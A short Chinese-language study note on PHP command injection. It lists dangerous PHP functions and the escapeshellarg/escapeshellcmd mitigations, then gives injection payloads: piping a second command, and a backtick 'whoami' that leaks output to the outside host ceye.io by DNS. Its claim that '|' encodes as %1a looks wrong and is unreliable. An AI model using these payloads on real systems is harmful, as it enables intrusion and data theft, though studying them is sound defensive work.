passthru,exec,system,反引号,proc_open,shell_exec,pcntl_exec,popen
补充eval(),,assert(), preg_replace()[php 7.0版本不再使用], create_function, call_user_func, call_user_func_array,array_map(),ob_start()
解决方案:escapeshellarg(防止文件写入),escapeshellcmd(过滤# & ;``,| * ? ~ < > ^ ( ) [ ] { } $ \.注意没有过滤% 可以被绕过,“|”就是%1a)
单一命令加上“| 另一个命令”
如果是ping,则加上“`whoami`.ceye.io”